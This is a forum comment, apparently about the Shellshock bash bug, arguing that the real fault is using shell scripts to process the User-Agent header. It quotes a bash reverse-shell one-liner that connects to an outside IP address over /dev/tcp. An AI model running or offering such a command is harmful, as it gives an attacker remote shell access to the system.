Re: Bash is Bollocks for security
Amazingly, a tool is being used as a tool.
Even in a "minimal system" the tools to do maintenance must still be available from time to time. Unless we are talking embedded.
Whether "Bash is Bollocks for security" is neither here nor there.
The error here consists in making the swiss army knife usable from outside. That is a combination of using shell scripts to process the "Agent" header and having that bash bug. The error does not consist in having the swiss army knife available in the first place.
"/bin/bash –i >&/dev/tcp/220.127.116.11/2221 0>&1" does not do a whole lot. Would it work with any other shell on a system which has nice features underneath /dev/tcp? I sure hope so.
Why use shell scripts to process that "Agent" header? Well, now, that is the REAL question. They should have been gotten rid of some time ago.